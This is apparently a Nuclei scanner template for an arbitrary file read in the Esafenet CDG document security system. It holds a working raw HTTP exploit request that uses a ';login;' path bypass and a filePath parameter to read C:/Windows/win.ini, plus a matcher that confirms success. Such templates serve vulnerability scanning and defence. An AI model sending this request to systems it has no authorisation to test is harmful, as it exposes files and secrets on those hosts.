id: esafenet-decryptapplication-fileread

info:
  name: 亿赛通电子文档安全管理系统DecryptApplication存在任意文件
  author: Abbbbb
  severity: medium


http:
  - raw:
      - |
        GET /CDGServer3/client/;login;/DecryptApplication?command=ViewUploadFile&filePath=C:///Windows/win.ini&uploadFileId=1&fileName1= HTTP/1.1
        Host: {{Hostname}}
        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36

    matchers:
      - type: dsl
        dsl:
          - status_code==200 && contains_all(body,"fonts")